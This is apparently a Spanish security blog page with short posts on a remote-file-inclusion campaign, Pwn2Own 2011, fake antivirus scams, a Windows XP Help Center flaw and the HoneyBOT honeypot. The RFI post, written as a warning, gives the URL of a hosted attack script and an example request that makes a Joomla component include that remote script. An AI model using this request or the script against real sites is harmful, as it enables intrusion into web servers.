El siguiente es uno de los sitios web involucrado activamente (sea consciente o no) en los ataques web mediante scripts perl, php y/o malware a miles de webs y CMS escritos en PHP. Presumiblemente la persona que está detras de los ataques responde al nick “Karaw4nghacK“, un viejo conocido en el mundo de las botnet (que se lo pregunten a Peter Kleissner…jejejej). Por lo visto Karaw4nghacK no se da por vencido, y menos aun por escarmentado.

Acceda al website bajo su propia responsabilidad, el contenido del archivo podría haber cambiado:

http://www.aporteedailes.com/images/ID-RFI.txt??

Whois record: http://whois.domaintools.com/aporteedailes.com

URLVoid info: http://www.urlvoid.com/scan/aporteedailes.com

Contenido ID-RFI.txt:

Descarga:  ID-RFI.txt (desde mediafire, extensión cambiada a .avi)

Nombres habituales: id.txt, id1.txt, id2.txt, test.txt, head.txt, 1.txt, idxx.txt …

Ejemplo: GET/?option=com_fabrik&task=view¬itemid=&mosConfig absolute path=http://wwwaporteedalies.com/images/ID-RFI.txt??

El 24 de Marzo se celebrará Pwn2Own, una reunion de “aditores” que se realiza en Vancouver y que ofrece recompensas económicas a quienes logran encontrar bugs en aplicaciones, navegadores, sistemas operativos…etc. El evento tendrá lugar en el marco de la duodécima conferencia anual de CanSecWest (9-11 de marzo de 2011 en Vancouver, Columbia Británica) patrocinada por el equipo Zero Day Initiative (ZDI) de HP TippingPoint.

Según declaraciones de Aaron Portnoy, director del equipo de Investigación de Seguridad en TippingPoint Technologies:

“Este año, los navegadores web en la mira serán las últimas versiones Release Candidate (en el momento del concurso) de los siguientes productos: Microsoft Internet Explorer, Apple Safari, Mozilla Firefox, Google Chrome. Cada navegador será instalado en un sistema de 64 bits que ejecuta la última versión de OS X o Windows 7″.

En las últimas notícias que van apareciendo sobre el tema se comenta que los principales objeticos para los participantes en ésta reunion serán la Release Candidate (RC) de Internet Explorer 9 (IE9), que podría ser lanzada en breve así como el navegador por exceléncia Firefox, al igual que Chrome 10.

Los participantes optan a premios tan apetecibles como portatiles Sony Vaio con Windows 7, Alienware m11x con Windows 7, Apple MacBook Air 13 “con Mac OS X Snow Leopard, y Google CR-48 ejecutando ChromeOS… Read the rest of this entry

Los falsos Antivirus, también llamados Rogueware, FakeAV… no es algo nuevo, pero mucha gente sigue cayendo en la triquiñuela. Están diseñados para hacer creer al usuario que el sistema está siendo buenamente analizado en busca de malware, ofreciéndole en pantalla un panorama desastroso de infecciones, es decir pretenden hacerte creer que tu sistema está infectado con diferentes tipos de malware ofreciéndote un producto para solucionarlo, cuando obviamente lo que se pretende es proceder a infectarnos descaradamente. Estas cosas pasan, bien porque la web a la que accedemos es una URL maligna en sí, o bien porque la página web a la que accedemos ha sido vulnerada e incorpora por ejemplo un marco incorporado maligno (iframe). En la imagen podéis ver la URL a la que redirige:

-Pinche para ampliar-

El escenario podría ser el siguiente:

Te encuentras navegando por la inmensa red, cuando al acceder a una URL en concreto salta un mensaje parecido a éste:

Read the rest of this entry

La vulnerabilidad, conocida desde mediados de junio de 2010 y descubierta por Travis Ormandy, un ingeniero de Google, no fue tomada con mayor preocupación por Microsoft, al menos hasta ahora.

La compañía indicaba que el error, tal como lo mostraba Ormandy, no era de mayor importancia para los usuarios. Sin embargo, en los últimos días se han empezado a detectar ataques reales a través de dicho bug, para el cuál hasta el momento no existe parche automático (vía Windows Update)  para remendarlo, aunque ya hay un Fix a disposición de los usuarios desde la web de microsoft.

El sistema de ayuda integrado en Windows XP, está creado con la idea de brindar soporte a distancia a sus usuarios, y es parte del propio sistema operativo.

En las últimas horas, se calculan más de 10.000 máquinas atacadas utilizando esta vulnerabilidad, para explotarla solo debes lanzarla desde Metasploit.

Según el propio blog de seguridad de Microsoft, a través de las máquinas atacadas exitosamente, se están distribuyendo otros troyanos y malwares similares. Esto podría facilitar la creación de nuevas redes de máquinas zombi, aquellas que son “tomadas” por los delincuentes informáticos para su propio provecho, sin que el usuario de las mismas se percate de ello. Read the rest of this entry

HoneyBOT es una solución honeypot de baja interacción para Windows gratuita que podemos instalar con un solo click y sin más complicaciones en un pc de nuestra red local, o en un terminal dedicado, después de su instalación, solamente hay que configurarlo adaptándolo a nuestras necesidades y gustos. (Aunque no se aconseja debido al riesgo que conlleva, también puedes instalarlo en tu ordenador principal o por ejemplo en una máquina virtual).

¿Qué es un Honeypot?

Un honeypot es un dispositivo que se coloca en una red informática diseñada específicamente para capturar tráfico de red malicioso. La capacidad de registro de un honeypot es mucho mayor que cualquier otra herramienta de seguridad de red y otros datos a nivel de capturas raw incluso incluyendo las pulsaciones y errores cometidos por los piratas informáticos. La información capturada es muy valiosa, ya que contiene sólo el tráfico malicioso con poca o sin falsos positivos.
Honeypots se están convirtiendo en una de las principales herramientas de seguridad utilizadas para vigilar los últimos trucos y hazañas de los piratas informáticos mediante el registro de todos sus movimientos para que la comunidad de seguridad puede responder más rápidamente a nuevas hazañas.
Read the rest of this entry